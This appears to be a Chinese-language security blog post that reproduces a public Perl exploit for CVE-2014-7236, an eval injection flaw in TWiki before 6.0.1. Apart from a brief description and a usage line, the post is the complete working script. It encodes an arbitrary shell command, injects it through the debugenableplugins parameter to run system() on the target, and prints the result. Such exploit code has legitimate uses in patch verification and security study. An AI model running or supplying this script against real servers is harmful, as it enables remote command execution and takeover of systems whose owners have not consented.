# CVE-2014-7236 TWiki before 6.0.1任意perl代碼執行漏洞
==INFO==
Eval injection vulnerability in lib/TWiki/Plugins.pm in TWiki before 6.0.1 allows remote attackers to execute arbitrary Perl code via the debugenableplugins parameter to do/view/Main/WebHome.
==Usage==
perl exploit.pl host [cmd] ex. perl exploit.pl http://127.0.0.1/Main/WebHome "uname -a"
==EXP==
#!/usr/bin/perl =cut TWiki code execution CVE-2014-7236 m0nadref: http://seclists.org/fulldisclosure/2014/Oct/44 =cut use LWP::Simple; use strict; use diagnostics; use warnings; sub banner { print "[*] TWiki code execution CVE-2014-7236\n"; print "[*] m0nad \n"; } sub usage { print "[?] usage: perl $0 [cmd]\n"; print "[?] ex. perl $0 http://127.0.0.1/Main/WebHome \"uname -a\"\n"; exit; } sub exploit { my ($host, $cmd) = @_; $cmd = "echo start_xpl &&" . $cmd . "&& echo end_xpl"; my $byte = join('.', map { 'chr('.$_.')' } unpack('C*', $cmd)); my $payload = "?debugenableplugins=BackupRestorePlugin%3bprint%28%22Content-Type:text/html\\r\\n\\r\\n%22%29%3bprint(system($byte))%3b%3bexit"; my $res = get $host . $payload; print "[-] Exploit Failed\n" and exit unless ($res =~ m/start_xpl\n(.*?)end_xpl/ms); print "[+] $1"; } banner(); my $host = shift || usage(); my $cmd = shift || "echo Vulnerable!"; exploit($host, $cmd);
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容